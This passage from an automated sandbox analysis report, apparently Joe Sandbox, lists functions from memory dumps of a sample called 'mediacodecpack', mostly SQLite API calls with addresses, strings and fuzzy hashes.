                                                                                              • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                            • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                            • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                            • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                            • sqlite3_step.SQLITE3 ref: 60968139
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                            • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                              • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                              • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                              • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                            • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                            • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                            • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                            • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                            • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                            • sqlite3_free.SQLITE3 ref: 60969102
                                                                                            • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID: $d
                                                                                            • API String ID: 2451604321-2084297493
                                                                                            • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                            • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                            • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                            APIs
                                                                                            • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                            • sqlite3_free.SQLITE3 ref: 60966183
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                            • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                            • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                            • memcmp.MSVCRT ref: 6096639E
                                                                                              • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                              • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                            • String ID: ASC$DESC$x
                                                                                            • API String ID: 4082667235-1162196452
                                                                                            • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                            • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                            • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                              • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                              • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                            • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                            • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                            • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                              • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                            • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                            • String ID:
                                                                                            • API String ID: 961572588-0
                                                                                            • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                            • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                            • String ID: 2$foreign key$indexed
                                                                                            • API String ID: 4126863092-702264400
                                                                                            • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                            • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                            • API String ID: 912767213-1308749736
                                                                                            • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                            • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                              • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 4082478743-0
                                                                                            • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                            • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                            • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                            • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                            APIs
                                                                                              • Part of subcall function 02D48ADD: __EH_prolog.LIBCMT ref: 02D48AE2
                                                                                              • Part of subcall function 02D48ADD: _Allocate.LIBCPMT ref: 02D48B39
                                                                                              • Part of subcall function 02D48ADD: _memmove.LIBCMT ref: 02D48B90
                                                                                            • _memset.LIBCMT ref: 02D4F949
                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D4F9B2
                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D4F9BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                            • String ID: Unknown error$invalid string position
                                                                                            • API String ID: 1854462395-1837348584
                                                                                            • Opcode ID: 587c5c482a29036748163f89e31f7ec7f0babdf49d19e27d85c3772475a44c7b
                                                                                            • Instruction ID: a3dd02e959af017ca33b2a9ffb07d5ab0daf6f4cd7404f68823352bd185ddf05
                                                                                            • Opcode Fuzzy Hash: 587c5c482a29036748163f89e31f7ec7f0babdf49d19e27d85c3772475a44c7b
                                                                                            • Instruction Fuzzy Hash: 8351AF706083419FE714CF24C891B2EBBE4EB98744F50492EF492977A1DB71D988CB52
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$INTEGER
                                                                                            • API String ID: 317512412-1676293250
                                                                                            • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                            • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 4038589952-0
                                                                                            • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                            • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 247099642-0
                                                                                            • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                            • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                            • String ID:
                                                                                            • API String ID: 326482775-0
                                                                                            • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                            • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                            • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                            APIs
